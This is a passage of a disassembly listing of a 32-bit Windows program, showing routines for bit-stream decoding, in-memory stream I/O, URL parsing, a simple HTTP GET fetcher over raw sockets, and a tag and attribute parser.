cmp eax, [ebp+arg_C]
jge loc_9B3C8F
jmp short loc_9B3B10
; ---------------------------------------------------------------------------
loc_9B3B0D: ; CODE XREF: sub_9B3A12+14D�j
mov edi, [ebp+Src]
loc_9B3B10: ; CODE XREF: sub_9B3A12+F9�j
cmp [ebp+arg_4], edi
jge loc_9B3C8F
inc dword ptr [ebx+1Ch]
push dword ptr [ebx+1Ch] ; NewSize
push dword ptr [ebx+10h] ; Memory
call sub_9B132C
mov edi, eax
test edi, edi
pop ecx
pop ecx
mov [ebx+10h], edi
jz short loc_9B3B66
push esi
call sub_9B283A
shr eax, 8
pop ecx
mov ecx, [ebp+arg_4]
mov [edi+ecx], al
mov eax, [esi+0Ch]
add eax, 8
mov ecx, eax
and eax, 7
sar ecx, 3
add [esi+8], ecx
inc [ebp+arg_4]
mov [esi+0Ch], eax
mov eax, [ebp+arg_C]
cmp [esi+8], eax
jl short loc_9B3B0D
jmp loc_9B3C8F
; ---------------------------------------------------------------------------
loc_9B3B66: ; CODE XREF: sub_9B3A12+E7�j
; sub_9B3A12+11E�j
xor eax, eax
jmp loc_9B3D0C
; ---------------------------------------------------------------------------
loc_9B3B6D: ; CODE XREF: sub_9B3A12+283�j
push 1
push ebx
call sub_9B11E7
mov eax, [ebx+20h]
mov ecx, [ebx]
lea eax, [eax+eax*4]
lea edi, [ecx+eax*8]
push esi
mov [ebp+arg_4], edi
call sub_9B283A
add esp, 0Ch
test ah, ah
js short loc_9B3B9D
shr eax, 0Ch
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 4
jmp short loc_9B3BAB
; ---------------------------------------------------------------------------
loc_9B3B9D: ; CODE XREF: sub_9B3A12+17C�j
shr eax, 0Ah
sub eax, 18h
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 6
loc_9B3BAB: ; CODE XREF: sub_9B3A12+189�j
mov ecx, eax
and eax, 7
sar ecx, 3
add [esi+8], ecx
mov [esi+0Ch], eax
mov eax, [edi]
test ds:byte_9B9DC0[eax], 4
jz short loc_9B3BE5
push esi
call sub_9B283A
shr eax, 0Fh
mov [edi+4], eax
mov eax, [esi+0Ch]
inc eax
pop ecx
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
mov [esi+0Ch], eax
jmp short loc_9B3BE9
; ---------------------------------------------------------------------------
loc_9B3BE5: ; CODE XREF: sub_9B3A12+1B0�j
and dword ptr [edi+4], 0
loc_9B3BE9: ; CODE XREF: sub_9B3A12+1D1�j
mov ecx, [edi]
push 3
pop eax
mov [edi+1Ch], eax
mov [edi+0Ch], eax
movzx ecx, ds:byte_9B9DC0[ecx]
and ecx, eax
lea eax, [edi+18h]
mov [ebp+var_4], eax
mov dword ptr [eax], 0
lea eax, [edi+8]
mov [ebp+Src], ecx
mov dword ptr [eax], 0
jle short loc_9B3C8C
push dword ptr [edi+4]
mov ebx, [ebp+arg_0]
mov edi, eax
call sub_9B3852
cmp [ebp+Src], 2
pop ecx
jnz short loc_9B3C3C
mov eax, [ebp+arg_4]
push dword ptr [eax+4]
mov edi, [ebp+var_4]
call sub_9B3852
pop ecx
jmp short loc_9B3C89
; ---------------------------------------------------------------------------
loc_9B3C3C: ; CODE XREF: sub_9B3A12+217�j
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+0Ch], 1
jnz short loc_9B3C89
mov eax, [ecx]
test ds:byte_9B9DC0[eax], 18h
jz short loc_9B3C89
mov eax, [ecx+10h]
mov edx, 100h
cmp eax, edx
jl short loc_9B3C60
sub eax, edx
jmp short loc_9B3C86
; ---------------------------------------------------------------------------
loc_9B3C60: ; CODE XREF: sub_9B3A12+248�j
cmp eax, 88h
jl short loc_9B3C6E
sub eax, 108h
jmp short loc_9B3C80
; ---------------------------------------------------------------------------
loc_9B3C6E: ; CODE XREF: sub_9B3A12+253�j
cmp eax, 10h
jl short loc_9B3C78
sub eax, 8
jmp short loc_9B3C80
; ---------------------------------------------------------------------------
loc_9B3C78: ; CODE XREF: sub_9B3A12+25F�j
cmp eax, 8
jl short loc_9B3C80
sub eax, 10h
loc_9B3C80: ; CODE XREF: sub_9B3A12+25A�j
; sub_9B3A12+264�j ...
mov edx, [ebp+arg_10]
add eax, [edx+20h]
loc_9B3C86: ; CODE XREF: sub_9B3A12+24C�j
mov [ecx+10h], eax
loc_9B3C89: ; CODE XREF: sub_9B3A12+228�j
; sub_9B3A12+231�j ...
mov ebx, [ebp+arg_10]
loc_9B3C8C: ; CODE XREF: sub_9B3A12+203�j
inc dword ptr [ebx+20h]
loc_9B3C8F: ; CODE XREF: sub_9B3A12+C8�j
; sub_9B3A12+F3�j ...
mov eax, [ebp+arg_C]
cmp [esi+8], eax
jl loc_9B3B6D
loc_9B3C9B: ; CODE XREF: sub_9B3A12+5D�j
push 1
push ebx
call sub_9B11E7
mov edx, [ebx]
pop ecx
pop ecx
mov ecx, [ebx+20h]
lea eax, [ecx+ecx*4]
lea eax, [edx+eax*8]
inc ecx
mov [ebx+20h], ecx
lea ecx, [eax+10h]
mov [eax+8], ecx
lea ecx, [eax+20h]
mov [eax+18h], ecx
push 3
pop ecx
mov [eax+1Ch], ecx
mov [eax+0Ch], ecx
xor edx, edx
mov dword ptr [eax], 16h
xor ecx, ecx
cmp [ebx+20h], edx
jle short loc_9B3CFD
xor esi, esi
loc_9B3CDA: ; CODE XREF: sub_9B3A12+2E9�j
mov eax, [ebx]
add eax, esi
cmp [eax+8], edx
jnz short loc_9B3CE9
lea edi, [eax+10h]
mov [eax+8], edi
loc_9B3CE9: ; CODE XREF: sub_9B3A12+2CF�j
cmp [eax+18h], edx
jnz short loc_9B3CF4
lea edi, [eax+20h]
mov [eax+18h], edi
loc_9B3CF4: ; CODE XREF: sub_9B3A12+2DA�j
inc ecx
add esi, 28h
cmp ecx, [ebx+20h]
jl short loc_9B3CDA
loc_9B3CFD: ; CODE XREF: sub_9B3A12+2C4�j
cmp [ebp+arg_C], edx
jz short loc_9B3D09
mov ecx, ebx
call sub_9B392F
loc_9B3D09: ; CODE XREF: sub_9B3A12+2EE�j
xor eax, eax
inc eax
loc_9B3D0C: ; CODE XREF: sub_9B3A12+156�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B3A12 endp
; =============== S U B R O U T I N E =======================================
sub_9B3D11 proc near ; CODE XREF: sub_9AF0BC+8D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, ds:dword_9BA2C8
mov [eax], ecx
mov eax, ds:dword_9BA2CC
retn
sub_9B3D11 endp
; =============== S U B R O U T I N E =======================================
sub_9B3D23 proc near ; CODE XREF: sub_9B1166+11�p
; sub_9B3EA2+D�p ...
arg_0 = dword ptr 4
cmp [esp+arg_0], 200200h
jnz short loc_9B3D48
xor eax, eax
cmp ds:dword_9BA2CC, eax
jz short loc_9B3D66
mov ds:dword_9BA2CC, eax
mov ds:dword_9BA2C8, eax
mov ds:dword_9BA2D0, eax
jmp short loc_9B3D63
; ---------------------------------------------------------------------------
loc_9B3D48: ; CODE XREF: sub_9B3D23+8�j
cmp [esp+arg_0], 100100h
jnz short loc_9B3D66
xor eax, eax
mov ds:dword_9BA2D4, eax
mov ds:dword_9BA2D8, eax
mov ds:dword_9BA2DC, eax
loc_9B3D63: ; CODE XREF: sub_9B3D23+23�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_9B3D66: ; CODE XREF: sub_9B3D23+12�j
; sub_9B3D23+2D�j
or eax, 0FFFFFFFFh
retn
sub_9B3D23 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B3D6A(int, void *Dst, size_t Size)
sub_9B3D6A proc near ; CODE XREF: sub_9AF2B0+71�p
; sub_9B0BB7+21�p ...
arg_0 = dword ptr 4
Dst = dword ptr 8
Size = dword ptr 0Ch
cmp [esp+arg_0], 100100h
push esi
mov esi, [esp+4+Size]
jnz short loc_9B3DC1
mov edx, ds:dword_9BA2D4
test edx, edx
jz short loc_9B3DC1
mov ecx, ds:dword_9BA2D8
test ecx, ecx
jz short loc_9B3DC1
mov eax, ds:dword_9BA2DC
cmp eax, ecx
jl short loc_9B3D9A
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B3D9A: ; CODE XREF: sub_9B3D6A+2A�j
push edi
lea edi, [eax+esi]
cmp edi, ecx
pop edi
jle short loc_9B3DA7
sub ecx, eax
mov esi, ecx
loc_9B3DA7: ; CODE XREF: sub_9B3D6A+37�j
push esi ; Size
add eax, edx
push eax ; Src
push [esp+0Ch+Dst] ; Dst
call memcpy
add esp, 0Ch
add ds:dword_9BA2DC, esi
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B3DC1: ; CODE XREF: sub_9B3D6A+D�j
; sub_9B3D6A+17�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_9B3D6A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B3DC6(int, void *Src, size_t Size)
sub_9B3DC6 proc near ; CODE XREF: sub_9AF3BC+D�p
; sub_9B0D88+46�p
arg_0 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
cmp [esp+arg_0], 200200h
push esi
mov esi, [esp+4+Size]
jnz short loc_9B3E1D
mov edx, ds:dword_9BA2CC
test edx, edx
jz short loc_9B3E1D
mov ecx, ds:dword_9BA2C8
test ecx, ecx
jz short loc_9B3E1D
mov eax, ds:dword_9BA2D0
cmp eax, ecx
jl short loc_9B3DF6
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B3DF6: ; CODE XREF: sub_9B3DC6+2A�j
push edi
lea edi, [eax+esi]
cmp edi, ecx
pop edi
jle short loc_9B3E03
sub ecx, eax
mov esi, ecx
loc_9B3E03: ; CODE XREF: sub_9B3DC6+37�j
push esi ; Size
push [esp+8+Src] ; Src
add eax, edx
push eax ; Dst
call memcpy
add esp, 0Ch
add ds:dword_9BA2D0, esi
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B3E1D: ; CODE XREF: sub_9B3DC6+D�j
; sub_9B3DC6+17�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_9B3DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3E22 proc near ; CODE XREF: sub_9B0C53+F�p
; sub_9B0C53+62�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_0], 100100h
jnz short loc_9B3E61
cmp [ebp+arg_8], 0
jnz short loc_9B3E39
mov eax, [ebp+arg_4]
jmp short loc_9B3E5A
; ---------------------------------------------------------------------------
loc_9B3E39: ; CODE XREF: sub_9B3E22+10�j
cmp [ebp+arg_8], 1
jnz short loc_9B3E49
mov eax, ds:dword_9BA2DC
add eax, [ebp+arg_4]
jmp short loc_9B3E5A
; ---------------------------------------------------------------------------
loc_9B3E49: ; CODE XREF: sub_9B3E22+1B�j
cmp [ebp+arg_8], 2
jnz short loc_9B3E9D
mov eax, [ebp+arg_4]
mov ecx, ds:dword_9BA2D8
add eax, ecx
loc_9B3E5A: ; CODE XREF: sub_9B3E22+15�j
; sub_9B3E22+25�j
mov ds:dword_9BA2DC, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B3E61: ; CODE XREF: sub_9B3E22+A�j
cmp [ebp+arg_0], 200200h
jnz short loc_9B3E9D
cmp [ebp+arg_8], 0
jnz short loc_9B3E75
mov eax, [ebp+arg_4]
jmp short loc_9B3E96
; ---------------------------------------------------------------------------
loc_9B3E75: ; CODE XREF: sub_9B3E22+4C�j
cmp [ebp+arg_8], 1
jnz short loc_9B3E85
mov eax, ds:dword_9BA2D0
add eax, [ebp+arg_4]
jmp short loc_9B3E96
; ---------------------------------------------------------------------------
loc_9B3E85: ; CODE XREF: sub_9B3E22+57�j
cmp [ebp+arg_8], 2
jnz short loc_9B3E9D
mov eax, [ebp+arg_4]
mov ecx, ds:dword_9BA2C8
add eax, ecx
loc_9B3E96: ; CODE XREF: sub_9B3E22+51�j
; sub_9B3E22+61�j
mov ds:dword_9BA2D0, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B3E9D: ; CODE XREF: sub_9B3E22+2B�j
; sub_9B3E22+46�j ...
or eax, 0FFFFFFFFh
pop ebp
retn
sub_9B3E22 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B3EA2(int, char, size_t Size)
sub_9B3EA2 proc near ; CODE XREF: sub_9AF0BC+20�p
; sub_9B0FE1+A1�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
Size = dword ptr 0Ch
test [esp+arg_4], 2
push edi
jz short loc_9B3EDC
push 200200h
call sub_9B3D23
mov edi, [esp+8+Size]
push edi ; Size
call malloc
test eax, eax
pop ecx
pop ecx
mov ds:dword_9BA2CC, eax
jz short loc_9B3ED7
mov ds:dword_9BA2C8, edi
mov eax, 200200h
pop edi
retn
; ---------------------------------------------------------------------------
loc_9B3ED7: ; CODE XREF: sub_9B3EA2+26�j
or eax, 0FFFFFFFFh
pop edi
retn
; ---------------------------------------------------------------------------
loc_9B3EDC: ; CODE XREF: sub_9B3EA2+6�j
mov ecx, 100100h
push ecx
call sub_9B3D23
mov eax, [esp+8+arg_0]
mov ds:dword_9BA2D4, eax
mov eax, [esp+8+Size]
add esp, 4
mov ds:dword_9BA2D8, eax
mov eax, ecx
pop edi
retn
sub_9B3EA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B3F00(char *name, u_short netshort, int, int, char *Dest, size_t Count)
sub_9B3F00 proc near ; CODE XREF: sub_9B4207+42�p
buf = byte ptr -834h
var_833 = byte ptr -833h
var_832 = byte ptr -832h
var_831 = byte ptr -831h
Src = byte ptr -830h
var_34 = byte ptr -34h
in = in_addr ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
Dst = byte ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
s = dword ptr -10h
var_C = dword ptr -0Ch
namelen = dword ptr -8
Memory = dword ptr -4
name = dword ptr 8
netshort = word ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
Count = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 834h
mov eax, [ebp+arg_C]
push edi
push [ebp+name] ; name
xor edi, edi
mov [eax], edi
call gethostbyname
cmp eax, edi
jnz short loc_9B3F25
xor eax, eax
jmp loc_9B4109
; ---------------------------------------------------------------------------
loc_9B3F25: ; CODE XREF: sub_9B3F00+1C�j
mov eax, [eax+0Ch]
push ebx
push 4 ; Size
push dword ptr [eax] ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy
push 8 ; Size
lea eax, [ebp+var_1C]
push edi ; Val
push eax ; Dst
call memset
add esp, 18h
push edi ; protocol
push 1 ; type
push 2 ; af
call socket
mov ebx, eax
cmp ebx, edi
mov [ebp+s], ebx
jge short loc_9B3F60
xor eax, eax
jmp loc_9B4108
; ---------------------------------------------------------------------------
loc_9B3F60: ; CODE XREF: sub_9B3F00+57�j
push esi
push dword ptr [ebp+netshort] ; netshort
mov [ebp+var_24], 2
call ntohs
push 10h
pop esi
mov [ebp+var_22], ax
push esi ; namelen
lea eax, [ebp+var_24]
push eax ; name
push ebx ; s
call connect
test eax, eax
jl loc_9B40FE
cmp [ebp+Dest], edi
jz short loc_9B3FBB
lea eax, [ebp+namelen]
push eax ; namelen
lea eax, [ebp+var_34]
push eax ; name
push ebx ; s
mov [ebp+namelen], esi
call getsockname
push [ebp+Count] ; Count
push dword ptr [ebp+in.S_un] ; in
call inet_ntoa
push eax ; Source
push [ebp+Dest] ; Dest
call strncpy
add esp, 0Ch
loc_9B3FBB: ; CODE XREF: sub_9B3F00+8E�j
movzx eax, [ebp+netshort]
push eax
push [ebp+name]
mov esi, 800h
push [ebp+arg_8]
lea eax, [ebp+buf]
push offset aGetSHttp1_1Hos ; "GET %s HTTP/1.1\r\nHost: %s:%d\r\nConnectio"...
push esi ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+buf]
push edi ; flags
push eax ; Str
call strlen
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push ebx ; s
call send
push 1388h
push esi
lea eax, [ebp+buf]
push eax
mov [ebp+var_14], 1
mov [ebp+Memory], edi
push ebx
jmp loc_9B40E1
; ---------------------------------------------------------------------------
loc_9B401B: ; CODE XREF: sub_9B3F00+1ED�j
cmp [ebp+var_14], 0
jz loc_9B40A8
xor eax, eax
lea ecx, [ebx-3]
test ecx, ecx
mov [ebp+namelen], eax
jle loc_9B40D1
loc_9B4035: ; CODE XREF: sub_9B3F00+163�j
cmp [ebp+eax+buf], 0Dh
jnz short loc_9B405D
cmp [ebp+eax+var_833], 0Ah
jnz short loc_9B405D
cmp [ebp+eax+var_832], 0Dh
jnz short loc_9B405D
cmp [ebp+eax+var_831], 0Ah
jz short loc_9B4067
loc_9B405D: ; CODE XREF: sub_9B3F00+13D�j
; sub_9B3F00+147�j ...
inc eax
cmp eax, ecx
mov [ebp+namelen], eax
jl short loc_9B4035
jmp short loc_9B40D1
; ---------------------------------------------------------------------------
loc_9B4067: ; CODE XREF: sub_9B3F00+15B�j
and [ebp+var_14], 0
lea ecx, [ebx-4]
cmp eax, ecx
jge short loc_9B40D1
sub ebx, eax
mov [ebp+var_C], ebx
add ebx, edi
lea eax, [ebx-4]
push eax ; NewSize
push [ebp+Memory] ; Memory
call realloc
mov ecx, [ebp+var_C]
add ecx, 0FFFFFFFCh
push ecx ; Size
mov ecx, [ebp+namelen]
lea ecx, [ebp+ecx+Src]
push ecx ; Src
add edi, eax
push edi ; Dst
mov [ebp+Memory], eax
call memcpy
lea edi, [ebx-4]
jmp short loc_9B40CE
; ---------------------------------------------------------------------------
loc_9B40A8: ; CODE XREF: sub_9B3F00+11F�j
lea eax, [ebx+edi]
push eax ; NewSize
push [ebp+Memory] ; Memory
mov [ebp+var_C], eax
call realloc
push ebx ; Size
lea ecx, [ebp+buf]
push ecx ; Src
add edi, eax
push edi ; Dst
mov [ebp+Memory], eax
call memcpy
mov edi, [ebp+var_C]
loc_9B40CE: ; CODE XREF: sub_9B3F00+1A6�j
add esp, 14h
loc_9B40D1: ; CODE XREF: sub_9B3F00+12F�j
; sub_9B3F00+165�j ...
push 1388h ; int
push esi ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
loc_9B40E1: ; CODE XREF: sub_9B3F00+116�j
call sub_9B4AC0
mov ebx, eax
add esp, 10h
test ebx, ebx
jg loc_9B401B
mov eax, [ebp+arg_C]
mov ebx, [ebp+s]
mov [eax], edi
mov edi, [ebp+Memory]
loc_9B40FE: ; CODE XREF: sub_9B3F00+85�j
push ebx ; s
call closesocket
mov eax, edi
pop esi
loc_9B4108: ; CODE XREF: sub_9B3F00+5B�j
pop ebx
loc_9B4109: ; CODE XREF: sub_9B3F00+20�j
pop edi
leave
retn
sub_9B3F00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B410C(char *Str, void *Dest, int, int)
sub_9B410C proc near ; CODE XREF: sub_9B4207+27�p
; sub_9B4C5A+120�p
Str = dword ptr 8
Dest = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+Str]
push edi
push offset asc_9A6B18 ; "://"
push esi ; Str
call strstr
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_9B4200
add ebx, 3
cmp byte ptr [esi], 68h
jnz loc_9B4200
cmp byte ptr [esi+1], 74h
jnz loc_9B4200
cmp byte ptr [esi+2], 74h
jnz loc_9B4200
cmp byte ptr [esi+3], 70h
jnz loc_9B4200
mov edi, strchr
push 3Ah ; Val
push ebx ; Str
call edi ; strchr
push 2Fh ; Val
push ebx ; Str
mov esi, eax
call edi ; strchr
mov edi, eax
add esp, 10h
test edi, edi
jz loc_9B4200
push 41h ; Size
push 0 ; Val
push [ebp+Dest] ; Dst
call memset
add esp, 0Ch
test esi, esi
jz short loc_9B41D4
cmp esi, edi
ja short loc_9B41D4
mov eax, esi
sub eax, ebx
cmp eax, 40h
jle short loc_9B4199
push 40h
pop eax
loc_9B4199: ; CODE XREF: sub_9B410C+88�j
push eax ; Count
push ebx ; Source
push [ebp+Dest] ; Dest
call strncpy
mov ecx, [ebp+arg_8]
add esp, 0Ch
and word ptr [ecx], 0
jmp short loc_9B41CB
; ---------------------------------------------------------------------------
loc_9B41B0: ; CODE XREF: sub_9B410C+C4�j
cmp al, 39h
jg short loc_9B41F6
xor eax, eax
mov ax, [ecx]
imul ax, 0Ah
mov [ecx], ax
movsx dx, byte ptr [esi]
lea eax, [edx+eax-30h]
mov [ecx], ax
loc_9B41CB: ; CODE XREF: sub_9B410C+A2�j
inc esi
mov al, [esi]
cmp al, 30h
jge short loc_9B41B0
jmp short loc_9B41F6
; ---------------------------------------------------------------------------
loc_9B41D4: ; CODE XREF: sub_9B410C+7B�j
; sub_9B410C+7F�j
mov eax, edi
sub eax, ebx
cmp eax, 40h
jle short loc_9B41E0
push 40h
pop eax
loc_9B41E0: ; CODE XREF: sub_9B410C+CF�j
push eax ; Count
push ebx ; Source
push [ebp+Dest] ; Dest
call strncpy
mov eax, [ebp+arg_8]
add esp, 0Ch
mov word ptr [eax], 50h
loc_9B41F6: ; CODE XREF: sub_9B410C+A6�j
; sub_9B410C+C6�j
mov eax, [ebp+arg_C]
mov [eax], edi
xor eax, eax
inc eax
jmp short loc_9B4202
; ---------------------------------------------------------------------------
loc_9B4200: ; CODE XREF: sub_9B410C+1B�j
; sub_9B410C+27�j ...
xor eax, eax
loc_9B4202: ; CODE XREF: sub_9B410C+F2�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9B410C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B4207(char *Str, int, int netshort, size_t Count)
sub_9B4207 proc near ; CODE XREF: sub_9B4B6B+32�p
Dest = byte ptr -44h
Str = dword ptr 8
arg_4 = dword ptr 0Ch
netshort = dword ptr 10h
Count = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 44h
push esi
mov esi, [ebp+netshort]
push edi
mov edi, [ebp+arg_4]
and dword ptr [edi], 0
test esi, esi
jz short loc_9B421F
mov byte ptr [esi], 0
loc_9B421F: ; CODE XREF: sub_9B4207+13�j
lea eax, [ebp+arg_4]
push eax ; int
lea eax, [ebp+netshort]
push eax ; int
lea eax, [ebp+Dest]
push eax ; Dest
push [ebp+Str] ; Str
call sub_9B410C
add esp, 10h
test eax, eax
jz short loc_9B4251
push [ebp+Count] ; Count
lea eax, [ebp+Dest]
push esi ; Dest
push edi ; int
push [ebp+arg_4] ; int
push [ebp+netshort] ; netshort
push eax ; name
call sub_9B3F00
add esp, 18h
loc_9B4251: ; CODE XREF: sub_9B4207+31�j
pop edi
pop esi
leave
retn
sub_9B4207 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B4255 proc near ; CODE XREF: sub_9B43AF+97�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
jmp loc_9B4397
; ---------------------------------------------------------------------------
loc_9B4265: ; CODE XREF: sub_9B4255+148�j
mov ecx, [esi+8]
mov al, [ecx]
cmp al, 2Fh
jz loc_9B43A8
cmp al, 3Eh
jz loc_9B43A8
mov bl, 20h
cmp al, bl
jz loc_9B4394
cmp al, 9
jz loc_9B4394
cmp al, 0Dh
jz loc_9B4394
cmp al, 0Ah
jz loc_9B4394
and [ebp+arg_0], 0
mov dl, 3Dh
cmp al, dl
mov [ebp+var_8], ecx
jz short loc_9B42D1
loc_9B42A9: ; CODE XREF: sub_9B4255+7A�j
mov eax, [esi+8]
mov cl, [eax]
cmp cl, bl
jz short loc_9B42D1
cmp cl, 9
jz short loc_9B42D1
cmp cl, 0Dh
jz short loc_9B42D1
cmp cl, 0Ah
jz short loc_9B42D1
inc [ebp+arg_0]
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb short loc_9B430E
cmp [eax], dl
jnz short loc_9B42A9
loc_9B42D1: ; CODE XREF: sub_9B4255+52�j
; sub_9B4255+5B�j ...
mov eax, [esi+8]
cmp [eax], dl
jz short loc_9B42EA
mov eax, [esi+4]
loc_9B42DB: ; CODE XREF: sub_9B4255+93�j
inc dword ptr [esi+8]
cmp [esi+8], eax
jnb short loc_9B430E
mov ecx, [esi+8]
cmp [ecx], dl
jnz short loc_9B42DB
loc_9B42EA: ; CODE XREF: sub_9B4255+81�j
inc dword ptr [esi+8]
mov eax, [esi+8]
loc_9B42F0: ; CODE XREF: sub_9B4255+B7�j
mov cl, [eax]
cmp cl, bl
jz short loc_9B4305
cmp cl, 9
jz short loc_9B4305
cmp cl, 0Dh
jz short loc_9B4305
cmp cl, 0Ah
jnz short loc_9B4316
loc_9B4305: ; CODE XREF: sub_9B4255+9F�j
; sub_9B4255+A4�j ...
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jb short loc_9B42F0
loc_9B430E: ; CODE XREF: sub_9B4255+76�j
; sub_9B4255+8C�j ...
or eax, 0FFFFFFFFh
loc_9B4311: ; CODE XREF: sub_9B4255+155�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B4316: ; CODE XREF: sub_9B4255+AE�j
mov cl, [eax]
cmp cl, 27h
jz short loc_9B4358
cmp cl, 22h
jz short loc_9B4358
xor edi, edi
cmp cl, bl
mov [ebp+var_4], eax
jz short loc_9B437B
loc_9B432B: ; CODE XREF: sub_9B4255+FF�j
mov cl, [eax]
cmp cl, 9
jz short loc_9B437B
cmp cl, 0Dh
jz short loc_9B437B
cmp cl, 0Ah
jz short loc_9B437B
cmp cl, 3Eh
jz short loc_9B437B
cmp cl, 2Fh
jz short loc_9B437B
inc edi
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb short loc_9B430E
mov ecx, eax
cmp [ecx], bl
jnz short loc_9B432B
jmp short loc_9B437B
; ---------------------------------------------------------------------------
loc_9B4358: ; CODE XREF: sub_9B4255+C6�j
; sub_9B4255+CB�j
mov edx, [esi+4]
inc eax
cmp eax, edx
mov [esi+8], eax
jnb short loc_9B430E
xor edi, edi
cmp [eax], cl
mov [ebp+var_4], eax
jz short loc_9B437B
loc_9B436C: ; CODE XREF: sub_9B4255+124�j
inc edi
inc eax
cmp eax, edx
mov [esi+8], eax
jnb short loc_9B430E
mov ebx, eax
cmp [ebx], cl
jnz short loc_9B436C
loc_9B437B: ; CODE XREF: sub_9B4255+D4�j
; sub_9B4255+DB�j ...
mov eax, [esi+20h]
test eax, eax
jz short loc_9B4394
push edi
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+var_8]
push dword ptr [esi+10h]
call eax
add esp, 14h
loc_9B4394: ; CODE XREF: sub_9B4255+29�j
; sub_9B4255+31�j ...
inc dword ptr [esi+8]
loc_9B4397: ; CODE XREF: sub_9B4255+B�j
mov eax, [esi+8]
cmp eax, [esi+4]
jb loc_9B4265
jmp loc_9B430E
; ---------------------------------------------------------------------------
loc_9B43A8: ; CODE XREF: sub_9B4255+17�j
; sub_9B4255+1F�j
xor eax, eax
jmp loc_9B4311
sub_9B4255 endp
; =============== S U B R O U T I N E =======================================
sub_9B43AF proc near ; CODE XREF: sub_9B450D+12�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+4]
dec eax
cmp [esi+8], eax
jnb loc_9B450B
push ebx
push edi
loc_9B43C3: ; CODE XREF: sub_9B43AF+154�j
mov ecx, [esi+8]
cmp byte ptr [ecx], 3Ch
jnz loc_9B44F8
lea eax, [ecx+1]
cmp byte ptr [eax], 3Fh
jz loc_9B44F8
xor edx, edx
mov [esi+8], eax
cmp byte ptr [eax], 20h
mov edi, eax
jz loc_9B44B6
loc_9B43EB: ; CODE XREF: sub_9B43AF+7B�j
mov eax, [esi+8]
mov cl, [eax]
cmp cl, 9
jz short loc_9B442C
cmp cl, 0Dh
jz short loc_9B442C
cmp cl, 0Ah
jz short loc_9B442C
cmp cl, 3Eh
jz short loc_9B442C
cmp cl, 2Fh
jz short loc_9B442C
inc edx
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb loc_9B4509
cmp byte ptr [eax], 3Ah
jnz short loc_9B4424
xor edx, edx
inc eax
mov [esi+8], eax
mov edi, eax
loc_9B4424: ; CODE XREF: sub_9B43AF+6B�j
mov eax, [esi+8]
cmp byte ptr [eax], 20h
jnz short loc_9B43EB
loc_9B442C: ; CODE XREF: sub_9B43AF+44�j
; sub_9B43AF+49�j ...
test edx, edx
jle loc_9B44B6
mov eax, [esi+14h]
test eax, eax
jz short loc_9B4445
push edx
push edi
push dword ptr [esi+10h]
call eax
add esp, 0Ch
loc_9B4445: ; CODE XREF: sub_9B43AF+8A�j
push esi
call sub_9B4255
test eax, eax
pop ecx
jnz loc_9B4509
mov eax, [esi+8]
cmp byte ptr [eax], 2Fh
jz loc_9B44FC
mov ecx, [esi+4]
xor edi, edi
inc eax
mov ebx, eax
jmp short loc_9B4481
; ---------------------------------------------------------------------------
loc_9B446A: ; CODE XREF: sub_9B43AF+D7�j
mov dl, [eax]
cmp dl, 20h
jz short loc_9B4480
cmp dl, 9
jz short loc_9B4480
cmp dl, 0Dh
jz short loc_9B4480
cmp dl, 0Ah
jnz short loc_9B448A
loc_9B4480: ; CODE XREF: sub_9B43AF+C0�j
; sub_9B43AF+C5�j ...
inc eax
loc_9B4481: ; CODE XREF: sub_9B43AF+B9�j
cmp eax, ecx
